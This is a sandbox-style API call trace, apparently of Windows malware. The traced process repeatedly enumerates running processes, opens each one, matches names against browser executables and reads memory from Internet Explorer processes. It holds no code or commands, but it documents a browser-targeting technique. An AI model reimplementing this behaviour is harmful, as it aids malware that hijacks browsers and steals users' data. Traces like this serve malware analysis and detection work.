	[0195.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.331] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.331] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0195.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.332] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.332] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0195.333] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xecc
	[0195.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.333] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0195.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.334] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.334] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0195.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.335] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.335] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0195.336] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xed0
	[0195.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.336] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0195.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.337] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.337] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0195.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.338] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.339] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0195.339] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xed4
	[0195.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.339] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0195.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.340] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.340] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0195.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.341] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.341] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0195.342] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xed8
	[0195.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.342] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0195.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.342] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0195.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.343] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0195.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.343] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.343] NtQueryInformationProcess (in: ProcessHandle=0xed8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0195.343] ReadProcessMemory (in: hProcess=0xed8, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0195.343] ReadProcessMemory (in: hProcess=0xed8, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0195.343] ReadProcessMemory (in: hProcess=0xed8, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0195.343] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0195.344] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0195.344] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xedc
	[0195.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.344] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0195.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.345] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0195.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.345] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0195.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.345] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.345] NtQueryInformationProcess (in: ProcessHandle=0xedc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0195.346] ReadProcessMemory (in: hProcess=0xedc, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0195.346] ReadProcessMemory (in: hProcess=0xedc, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0195.346] ReadProcessMemory (in: hProcess=0xedc, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0195.346] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0195.346] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0195.347] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xee0
	[0195.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.347] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0195.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.347] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.348] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0195.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.348] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.348] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0195.349] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xee4
	[0195.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.349] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0195.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.349] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.350] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0195.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.350] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.350] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.351] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xee8
	[0195.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.351] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.351] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.352] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.352] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.352] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.353] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0195.354] CloseHandle (hObject=0x188) returned 1
	[0195.354] Sleep (dwMilliseconds=0x64) 
	[0195.469] GetCurrentProcessId () returned 0x110
	[0195.469] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0195.471] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0195.472] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0195.473] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0195.473] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xeec
	[0195.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.473] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0195.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.474] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.474] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0195.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.474] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.474] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0195.475] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xef0
	[0195.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.475] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0195.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.475] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.476] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0195.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.476] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.476] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0195.477] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xef4
	[0195.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.477] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0195.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.477] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.478] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0195.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.478] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.478] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0195.479] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xef8
	[0195.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.479] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0195.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.480] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.480] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0195.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.480] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.480] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0195.481] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xefc
	[0195.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.481] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0195.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.481] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.482] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0195.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.482] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.482] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0195.483] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xf00
	[0195.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.483] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0195.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.483] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.484] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0195.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.484] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.484] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0195.485] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xf04
	[0195.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.485] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0195.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.485] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.486] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0195.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.486] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.486] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0195.487] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xf08
	[0195.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.487] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0195.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.487] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.487] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0195.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.488] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.488] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.488] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xf0c
	[0195.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.489] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.489] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.489] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.490] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.490] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.490] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xf10
	[0195.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.490] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.491] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.491] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.491] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.492] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.492] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xf14
	[0195.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.492] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.493] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.493] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.493] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.493] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.494] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xf18
	[0195.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.494] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.495] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.495] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.495] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.495] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.496] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xf1c
	[0195.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.496] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.496] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.497] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.497] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
